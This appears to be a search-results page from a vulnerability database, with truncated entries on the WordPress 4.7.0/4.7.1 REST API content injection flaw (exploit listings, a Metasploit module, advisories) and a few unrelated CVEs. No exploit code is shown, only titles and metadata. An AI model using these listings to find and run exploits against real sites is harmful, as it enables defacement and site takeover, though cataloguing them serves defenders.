4943 matches found
WordPress REST API Content Injection
This module exploits a content injection vulnerability in WordPress versions 4.7 and 4.7.1 via type juggling in the REST API. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'WordPress REST API...
WordPress REST API Plugin Content Injection Vulnerability
WordPress is a free and open source blogging software and content management system that uses PHP and MySQL as its platform. A content injection vulnerability exists in the WordPress REST API plugin. A remote attacker can exploit the vulnerability to elevate privileges or perform content injectio...
WordPress Silently Fixed Privilege Escalation Vulnerability in 4.72 Update
WordPress silently fixed a serious content injection vulnerability when it pushed out its latest security release, 4.7.2, last week. Sucuri, the firm that found the vulnerability, disclosed it Wednesday and said that if exploited, it could have let an attacker modify the content of any WordPress...
WordPress REST API Content Injection
A content injection vulnerability exists in WordPress REST API. A remote attacker may exploit this vulnerability by sending a malicious request to the server. Successful exploitation would allow an attacker to inject and change content...
WordPress 4.7.0 / 4.7.1 REST API Privilege Escalation Exploit
WordPress versions 4.7.0 and 4.7.1 REST API post privilege escalation and defacement exploit. !/usr/bin/env python ''' WordPress 4.7.0-4.7.1 REST API Post privilege escalation / defacement exploit @dustyfresh Date: 02-01-2017 Original vuln disclosed by Sucuri's research team Reference:...
WordPress 4.7.0 / 4.7.1 - Unauthenticated Content Injection (PoC) Exploit
Exploit for php platform in category web applications Exploit Title: Wordpress 4.7.0/4.7.1 Unauthenticated Content Injection PoC Date: 2017-02-02 Exploit Author: @leonjza Vendor Homepage: https://wordpress.org/ Software Link: https://wordpress.org/wordpress-4.7.zip Version: Wordpress 4.7.0/4.7.1...
WordPress 4.7.0 / 4.7.1 - Unauthenticated Content Injection Arbitrary Code Execution Exploit
Exploit for php platform in category web applications Exploit Title: WP Content Injection Shell Exploit Date: 31 Jan' 2017 Exploit Author: Harsh Jaiswal Vendor Homepage: http://wordpress.org Version: Wordpress 4.7 - 4.7.1 Patched in 4.7.2 Tested on: Bacbox ubuntu Linux Based on:...
WordPress REST API content injection vulnerability
1.漏洞信息: WordPress是一个以PHP和MySQL为平台的自由开源的博客软件和内容管理系统。在4.7.0版本后,REST API插件的功能被集成到WordPress中,由此也引发了一些安全性问题。近日,一个由REST API引起的影响WorePress4.7.0和4.7.1版本的漏洞被披露,该漏洞可以导致WordPress所有文章内容可以未经验证被查看,修改,删除,甚至创建新的文章,危害巨大。 2.漏洞影响版本: WordPress 4.7.0 WordPress 4.7.1 3.复现环境: Apache2.4 PHP 7.0 WordPress 4.7.1 4.复现过程:...
WordPress 4.7.04.7.1 - Content Injection (Ruby)
WordPress 4.7.04.7.1 - Content Injection Ruby Exploit Title: WP Content Injection Date: 31 Jan' 2017 Exploit Author: Harsh Jaiswal Vendor Homepage: http://wordpress.org Version: Wordpress 4.7 - 4.7.1 Patched in 4.7.2 Tested on: Backbox ubuntu Linux Based on...
WordPress 4.7.0 / 4.7.1 Content Injection / Code Execution
Exploit Title: WP Content Injection Shell Exploit Date: 31 Jan' 2017 Exploit Author: Harsh Jaiswal Vendor Homepage: http://wordpress.org Version: Wordpress 4.7 - 4.7.1 Patched in 4.7.2 Tested on: Bacbox ubuntu Linux Based on:...
CVE-2016-6044
IBM Tivoli Storage Manager Operations Center could allow an authenticated attacker to enable or disable the application's REST API, which may let the attacker violate security policy...
Design/Logic Flaw
IBM Tivoli Storage Manager Operations Center could allow an authenticated attacker to enable or disable the application's REST API, which may let the attacker violate security policy...
CVE-2016-6044
Summary: CVE-2016-6044 affects IBM Tivoli Storage Manager Operations Center and allows an authenticated user to enable/disable the REST API, potentially violating security policy. Affected versions: 7.1.0.000–7.1.7.000 and 6.4.1.000–6.4.2.400. Root cause/impact: REST API control vulnerability cou...
CVE-2016-6044
IBM Tivoli Storage Manager Operations Center could allow an authenticated attacker to enable or disable the application's REST API, which may let the attacker violate security policy...
WordPress 4.7.0-4.7.1 - Unauthenticated Page/Post Content Modification via REST API
...
WordPress < 4.7.2 Multiple Vulnerabilities
According to its self-reported version number, the WordPress application running on the remote web server is prior to 4.7.2. It is, therefore, affected by multiple vulnerabilities : - An information disclosure vulnerability exists in the class-wp-press-this.php script due to a failure to properly...
FreeBSD : wordpress -- multiple vulnerabilities (14ea4458-e5cd-11e6-b56d-38d547003487)
Aaron D. Campbell reports : WordPress versions 4.7.1 and earlier are affected by three security issues : - The user interface for assigning taxonomy terms in Press This is shown to users who do not have permissions to use it. - WPQuery is vulnerable to a SQL injection SQLi when passing unsafe dat...
wordpress -- multiple vulnerabilities
Aaron D. Campbell reports: WordPress versions 4.7.1 and earlier are affected by three security issues: The user interface for assigning taxonomy terms in Press This is shown to users who do not have permissions to use it. WPQuery is vulnerable to a SQL injection SQLi when passing unsafe data...
Splunk Enterprise HTTP Request Injection Vulnerability (SP-CAAAPSR)
Splunk Enterprise is prone to a HTTP request injection vulnerability. SPDX-FileCopyrightText: 2017 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only CPE =...
[BSA-114] Security update for wordpress
Craig Small [email protected] uploaded new packages for wordpress which fixed the following security problems: CVE-2016-10066, CVE-2016-10045 Potential Remote Command Execution RCE in PHPMailer CVE-2017-5488 Authenticated Cross-Site scripting XSS in update-core.php CVE-2017-5490 Stored Cross-Site...